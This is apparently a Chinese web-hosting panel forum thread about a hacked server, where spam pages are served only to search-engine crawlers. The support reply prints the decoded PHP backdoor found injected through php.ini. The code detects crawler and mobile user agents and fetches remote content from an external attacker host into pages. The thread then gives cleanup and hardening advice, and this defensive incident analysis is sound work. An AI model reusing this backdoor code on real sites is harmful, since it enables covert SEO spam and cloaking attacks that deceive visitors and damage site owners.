【已解决】网站被入侵了

我现在面板中创建一个默认站点

我现在面板中创建一个默认站点

我将User-agent设置为百度PC，这时候网站打开是正常的

接着我将默认站点的首页扩展名改成.php

在刷新首页、发现网站的首页源代码中已经有挂马了

其各位大神帮忙看一下 、这个是不是nginx被挂马了 ，网站源代码中一点问题都没有、但是通过模拟搜索引擎打开就被挂马、nginx卸载后重装问题依然存在

经过排查。发现你的网站早在去年。就被挂马





然后挂马一直存在。在服务器命令行中还有一条反弹shell 的指令


然后近期的使用的木马。可以在防篡改中进行查看

例如：




然后新建的网站为什么会被挂马。如下：
使用那些UA头的时候就返回如下的内容:



经过排查。并不是Nginx 导致的。而是php 导致的。
/www/server/php/54/etc/php.ini 文件。 第666行。可以看到



使用远程加载的方式进行挂马的。

解密出来的代码

1. <?php set_time_limit(0);error_reporting(0);$a=stristr;$c=$_SERVER;define('url',$c['REQUEST_URI']);define('ref',$c['HTTP_REFERER']);define('ent',$c['HTTP_USER_AGENT']);define('site','http://www.miyao958.com/utf8/?');define('road','road='.$c['HTTP_HOST'].url);define('waps','@Android|Browser|Mobile|Wap|iOs|iPad|iPhone|iPod@i');define('regs','@Baidu|Sogou|Yisou|Sm.cn@i');define('area',$a(url,'.xml')or $a(url,'.doc')or $a(url,'.txt')or $a(url,'.ppt')or $a(url,'.xls')or $a(url,'.csv')or $a(url,'.shtml'));if(preg_match(regs,ent)){if(area){echo papa(site.road.'&time');exit;}else{echo papa("http://www.miyao958.com/utf8/u.php");}}if(area&&preg_match(regs,ref)&&preg_match(waps,ent)){echo papa('http://www.miyao958.com/js2.html');exit;}elseif(area){echo '<!--Code:200-->'."\n";}function papa($e){$f=curl_init();curl_setopt($f,CURLOPT_URL,$e);curl_setopt($f,CURLOPT_USERAGENT,ent);curl_setopt($f,CURLOPT_TIMEOUT,30);curl_setopt($f,CURLOPT_RETURNTRANSFER,1);$g=curl_exec($f);return $g;}?>

复制代码

如果ua 是爬虫的UA 就返回远程文件的内容：


结合上面的信息来看。是某个网站存在漏洞。然后进行反弹shell 提权到root 权限。在php 中进行添加挂马配置的一个操作。



解决方案：
1.所有网站打包下载下来使用D盾进行扫描木马
2.把所有的PHP卸载重新安装一次。
3.建议您去找一家比较专业的公司对你的代码进行审计一下。

您好，如果您已尝试卸载nginx 或者重新新建站点后，就出现被篡改的现象，可能是您当前的服务器已经被植入木马了，这时候您卸载nginx或者重装PHP等服务也是无法处理的，建议您备份好您当前服务器的代码和数据库，使用木马查杀工具检查您的站点代码是否有被植入webshell提权脚本，然后重装您的服务器后，再部署您的站点项目，同时建议您检查您的站点代码是否有含有提权漏洞，并进行修复。附上收集的一些防挂马、篡改、恶意提权的小防护攻略。
1.网站上线前，对自己的项目用常用的一些工具进行程序漏洞安全扫描，并且做多份备份；
2.为了安全起见，网站后台管理地址经常改，改完做多份纪录保存，并且做好历史修改记录；
3.默认数据库名称要改，能复杂尽量复杂，用好复制粘贴按键；
4.后台启用验证码登录模块，不要怕麻烦，人家弄您网站的人都不嫌麻烦；
5.做好网站防护，比如非法上传文件、会员上传恶意文件的功能等，装好web防火墙；
6.服务器主机的ssh能不开就不能，尽量少使用root用户登录；即使登录也做好登录限制为仅允许自己的ip，高强度复杂的密码是第一必设项；
7.宝塔面板有多个辅助防护插件，例如调用系统防火墙、web防火墙（nginx防火墙/apache防火墙）、php安全防护、防篡改、防入侵等。

1.对比网站木马的的行为检测：
可以使用PHP网站安全告警检测

2.对于提权可以使用：防提权来禁止www

3.对于反弹shell 可以使用  入侵检测来进行检测